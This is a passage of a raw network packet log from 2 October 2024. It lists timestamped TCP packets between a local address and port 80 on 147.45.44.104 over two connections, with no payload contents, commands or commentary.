                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.503494024 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.503526926 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.503540993 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.503559113 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.503567934 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.503607988 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.504230022 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.504281998 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.504288912 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.504313946 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.504323006 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.504348040 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.504395008 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.551956892 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552012920 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552047014 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552079916 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552113056 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552133083 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552146912 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552244902 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552277088 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552319050 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552336931 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552336931 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552336931 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552352905 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552393913 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552660942 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552700043 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552711964 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552748919 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552750111 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552784920 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552798986 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552830935 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552841902 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552865982 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552869081 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.552903891 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553606987 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553724051 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553733110 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553769112 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553771973 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553805113 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553832054 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553836107 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553854942 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553870916 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553893089 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.553910971 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.554508924 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.554552078 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.554584026 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.554639101 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592581034 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592634916 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592668056 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592715979 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592747927 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592780113 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592812061 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592833996 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592833996 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592847109 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592860937 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592943907 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592977047 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.592989922 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593010902 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593030930 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593054056 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593060970 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593092918 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593097925 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593127012 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593158960 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593177080 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593192101 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593197107 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593470097 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593914986 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593962908 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.593997002 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594007969 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594029903 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594039917 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594063044 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594094992 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594105959 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594129086 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594161034 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594163895 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594194889 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594811916 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594863892 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594877005 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594896078 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594928980 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594958067 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.594990015 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595021963 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595022917 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595052958 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595055103 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595087051 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595124960 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595794916 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595849991 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595896959 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595896959 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595928907 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595932007 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595962048 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.595994949 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644462109 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644509077 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644545078 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644565105 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644601107 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644607067 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644633055 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644666910 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644668102 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644700050 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644716978 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644752026 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644757032 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644781113 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644794941 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644814014 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644819021 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644848108 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644849062 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644884109 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644885063 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.644927025 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645117044 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645168066 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645200014 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645205975 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645235062 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645333052 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645365953 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645374060 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645395041 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645399094 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645431995 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645433903 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645464897 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645466089 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645498037 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645962000 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.645997047 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646013021 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646045923 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646049023 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646080971 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646128893 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646161079 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646166086 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646193027 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646195889 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646225929 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646225929 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646259069 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646259069 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646291018 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646898031 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646934986 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646950006 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646984100 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.646984100 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647018909 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647047997 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647079945 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647083998 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647113085 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647114992 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647145033 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647147894 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647178888 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647178888 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647206068 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647836924 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647867918 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647871971 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647902012 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647902012 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647936106 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647957087 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.647974968 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682769060 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682786942 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682799101 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682816982 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682828903 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682853937 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682864904 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682914019 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682914019 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682950974 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682962894 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.682981014 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683003902 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683109999 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683140993 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683167934 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683180094 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683196068 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683208942 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683218002 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683249950 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683435917 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683470011 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683504105 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683515072 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683531046 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683545113 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683563948 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683572054 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683624029 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683649063 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683660030 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683671951 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683686972 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.683701992 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684078932 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684109926 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684143066 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684154034 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684170961 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684185982 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684220076 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684231043 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684241056 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684252024 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684257984 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684281111 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684395075 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684406042 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684417009 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684427023 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684427023 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684438944 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684449911 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.684473038 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685045004 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685089111 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685100079 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685118914 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685132027 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685185909 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685197115 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685206890 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685214043 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685229063 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685242891 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685348034 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685358047 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685369015 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685374975 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685379028 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685389996 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685400963 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685401917 CEST4972580192.168.2.6147.45.44.104
